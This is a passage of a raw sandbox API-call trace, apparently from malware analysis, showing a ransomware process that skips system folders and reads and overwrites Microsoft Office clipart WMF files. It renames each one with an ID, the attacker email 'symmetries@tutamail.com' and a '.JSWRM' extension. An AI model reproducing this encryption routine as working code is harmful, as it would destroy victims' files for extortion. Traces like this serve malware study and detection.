lpNumberOfBytesRead=0x345e89c*=0x1f30, lpOverlapped=0x0) returned 1 [0082.006] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.007] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1f30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1f30, lpOverlapped=0x0) returned 1 [0082.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.007] CloseHandle (hObject=0x314) returned 1 [0082.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0082.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0082.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0082.007] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0082.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0082.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0082.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0082.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0082.007] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107262.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107262.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107262.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0082.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0082.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0082.008] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe69d9e5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe69d9e5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1498, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107264.WMF", cAlternateFileName="")) returned 1 [0082.009] lstrcmpiW (lpString1="J0107264.WMF", lpString2=".") returned 1 [0082.009] lstrcmpiW (lpString1="J0107264.WMF", lpString2="..") returned 1 [0082.009] lstrcmpiW (lpString1="J0107264.WMF", lpString2="...") returned 1 [0082.009] lstrcmpiW (lpString1="J0107264.WMF", lpString2="windows") returned -1 [0082.009] lstrcmpiW (lpString1="J0107264.WMF", lpString2="recovery") returned -1 [0082.009] lstrcmpiW (lpString1="J0107264.WMF", lpString2="perflogs") returned -1 [0082.009] lstrcmpiW (lpString1="J0107264.WMF", lpString2="documents and settings") returned 1 [0082.009] lstrcmpiW (lpString1="J0107264.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.009] lstrcmpiW (lpString1="J0107264.WMF", lpString2="system volume information") returned -1 [0082.009] lstrcmpiW (lpString1="J0107264.WMF", lpString2="msocache") returned -1 [0082.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0082.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107264.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107264.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107264.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0082.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0082.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107264.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107264.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107264.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0082.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0082.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0082.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0082.009] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107264.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.010] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5272) returned 1 [0082.010] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1490) returned 0x205850 [0082.010] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1490, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1490, lpOverlapped=0x0) returned 1 [0082.012] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.012] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1490, lpOverlapped=0x0) returned 1 [0082.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.012] CloseHandle (hObject=0x314) returned 1 [0082.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0082.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0082.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0082.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0082.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0082.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0082.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.013] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107264.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107264.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107264.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0082.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0082.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0082.014] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16ec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107266.WMF", cAlternateFileName="")) returned 1 [0082.014] lstrcmpiW (lpString1="J0107266.WMF", lpString2=".") returned 1 [0082.014] lstrcmpiW (lpString1="J0107266.WMF", lpString2="..") returned 1 [0082.014] lstrcmpiW (lpString1="J0107266.WMF", lpString2="...") returned 1 [0082.014] lstrcmpiW (lpString1="J0107266.WMF", lpString2="windows") returned -1 [0082.014] lstrcmpiW (lpString1="J0107266.WMF", lpString2="recovery") returned -1 [0082.014] lstrcmpiW (lpString1="J0107266.WMF", lpString2="perflogs") returned -1 [0082.014] lstrcmpiW (lpString1="J0107266.WMF", lpString2="documents and settings") returned 1 [0082.014] lstrcmpiW (lpString1="J0107266.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.014] lstrcmpiW (lpString1="J0107266.WMF", lpString2="system volume information") returned -1 [0082.014] lstrcmpiW (lpString1="J0107266.WMF", lpString2="msocache") returned -1 [0082.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0082.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107266.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107266.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107266.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0082.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0082.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107266.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107266.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107266.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0082.014] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0082.014] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0082.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.014] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0082.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107266.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.015] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5868) returned 1 [0082.015] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.015] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16e0) returned 0x205850 [0082.015] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x16e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x16e0, lpOverlapped=0x0) returned 1 [0082.017] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.017] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x16e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x16e0, lpOverlapped=0x0) returned 1 [0082.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.017] CloseHandle (hObject=0x314) returned 1 [0082.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0082.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0082.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0082.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0082.017] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0082.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0082.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.017] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107266.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107266.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107266.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0082.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0082.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0082.018] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6c3c1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe6c3c1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe6c3c1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2b64, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107280.WMF", cAlternateFileName="")) returned 1 [0082.018] lstrcmpiW (lpString1="J0107280.WMF", lpString2=".") returned 1 [0082.018] lstrcmpiW (lpString1="J0107280.WMF", lpString2="..") returned 1 [0082.018] lstrcmpiW (lpString1="J0107280.WMF", lpString2="...") returned 1 [0082.018] lstrcmpiW (lpString1="J0107280.WMF", lpString2="windows") returned -1 [0082.018] lstrcmpiW (lpString1="J0107280.WMF", lpString2="recovery") returned -1 [0082.018] lstrcmpiW (lpString1="J0107280.WMF", lpString2="perflogs") returned -1 [0082.018] lstrcmpiW (lpString1="J0107280.WMF", lpString2="documents and settings") returned 1 [0082.018] lstrcmpiW (lpString1="J0107280.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.018] lstrcmpiW (lpString1="J0107280.WMF", lpString2="system volume information") returned -1 [0082.018] lstrcmpiW (lpString1="J0107280.WMF", lpString2="msocache") returned -1 [0082.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0082.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107280.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107280.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107280.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0082.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0082.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107280.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107280.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107280.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0082.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0082.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0082.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0082.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107280.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107280.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.019] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11108) returned 1 [0082.019] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b60) returned 0x24d210 [0082.019] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2b60, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2b60, lpOverlapped=0x0) returned 1 [0082.022] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.022] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2b60, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2b60, lpOverlapped=0x0) returned 1 [0082.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.022] CloseHandle (hObject=0x314) returned 1 [0082.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0082.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0082.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0082.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0082.022] RtlAllocateHeap (HeapHandle=0x1e0000, 